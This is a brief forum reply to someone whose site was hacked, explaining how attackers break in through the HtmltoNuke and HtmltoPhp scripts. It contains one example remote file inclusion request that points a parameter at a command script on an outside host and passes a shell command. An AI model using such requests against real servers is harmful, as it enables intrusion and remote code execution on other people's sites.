Anyway, sorry to hear that you got hacked already, but yes, thats exactly how he does it. Gets in, does his thing and screws you up for good. Its even easier if you use HtmltoNuke or HtmltoPhp, then they go in like this:
htmltophp.php?filnavn=http://www.creatividade.hpg.com.br/cmd.txt&cmd=uname-admin
Thats one of the most common forms of entry.
